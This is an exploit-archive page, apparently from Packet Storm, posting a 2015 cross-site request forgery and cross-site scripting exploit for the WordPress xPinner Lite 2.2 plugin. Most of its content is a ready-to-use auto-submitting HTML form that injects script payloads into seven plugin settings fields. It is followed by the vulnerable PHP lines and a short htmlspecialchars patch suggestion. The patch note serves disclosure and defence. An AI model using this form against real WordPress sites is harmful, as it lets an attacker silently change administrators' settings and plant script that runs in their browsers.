exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress xPinner Lite 2.2 Cross Site Request Forgery / Cross Site Scripting

WordPress xPinner Lite 2.2 Cross Site Request Forgery / Cross Site Scripting
Posted Sep 16, 2015
Authored by Amir.ght

WordPress xPinner plugin version 2.2 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | ded312a6c8bb5a97b7c6f891d95948a49bec9979cbf517dfa78db5d3bbfb8ffd

WordPress xPinner Lite 2.2 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
# Exploit Title: Wordpress xPinner Lite CSRF/XSS
# Exploit Author: Ashiyane Digital security Team
# Vendor Homepage: https://wordpress.org/plugins/xpinner-lite
# Software Link: https://downloads.wordpress.org/plugin/xpinner-lite.zip
# Version: 2.2
# Tested on: windows 7 /FireFox
# Date: 2015-09-14
####################################################
#Exploit :

<form name="XSS" method="POST"
action="http://127.0.0.1/wordpress/wp-admin/options-general.php?page=xpinner">
<input type="Hidden" name="pin_limit" value='"><script>alert(/XSS
1/)</script>' />
<input type="Hidden" name="limit_older_posts"
value='"><script>alert(/XSS 2/)</script>' />
<input type="Hidden" name="image_min"
value='"><script>alert(/XSS3/)</script>' />
<input type="Hidden" name="image_max"
value='"><script>alert(/XSS4/)</script>' />
<input type="Hidden" name="pinterest_email"
value='"><script>alert(/XSS 5/)</script>' />
<input type="Hidden" name="pinterest_password"
value='"><script>alert(/XSS 6/)</script>' />
<input type="Hidden" name="&pinterest_board_id"
value='"><script>alert(/XSS 7/)</script>' />
<input type="Hidden" name="xpinner_save_changes" value="Save Changes" />
</form>
<script language="javascript">
setTimeout(XSS.submit(),1);
</script>

####################################################################
# Vulnerable File : /wp-content/plugins/xpinner-lite/xpinner-lite.php
# Vulnerable codes: Lines 145,150,156,158,169,173,177
[145] : <input type="text" naMe="pin_limit" vAlue="<?php echo
$xpinner_options['pin_limit']; ?>" size="10">
[150] : <input type="text" name="limit_older_posts" value="<?php echo
$xpinner_options['limit_older_posts']; ?>" size="10">
[156] : <input type="text" name="image_min" value="<?php echo
$xpinner_options['image_min']; ?>" size="2">
[158] : <input type="text" name="image_max" value="<?php echo
$xpinner_options['image_max']; ?>" size="2">
[169] : <input type="text" name="pinterest_email" value="<?php echo
$xpinner_options['pinterest_email']; ?>" size="30">
[173] : <input type="text" name="pinterest_password" value="<?php echo
$xpinner_options['pinterest_password']; ?>" size="30">
[177] : <input type="text" name="pinterest_board_id" value="<?php echo
$xpinner_options['pinterest_board_id']; ?>" size="30">
=================================
For Patch :
You Should Use htmlspecialchars For Example :
[145] : <input type="text" name="pin_limit" value="<?php echo
htmlspecialchars($xpinner_options['pin_limit']); ?>" size="10">
##########################################################
discovered by : Amir.ght(Goldhack)
Login or Register to add favorites

File Archive:

May 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    16 Files
  • 3
    May 3rd
    38 Files
  • 4
    May 4th
    15 Files
  • 5
    May 5th
    35 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    8 Files
  • 9
    May 9th
    66 Files
  • 10
    May 10th
    19 Files
  • 11
    May 11th
    27 Files
  • 12
    May 12th
    8 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    1 Files
  • 15
    May 15th
    19 Files
  • 16
    May 16th
    66 Files
  • 17
    May 17th
    28 Files
  • 18
    May 18th
    32 Files
  • 19
    May 19th
    13 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close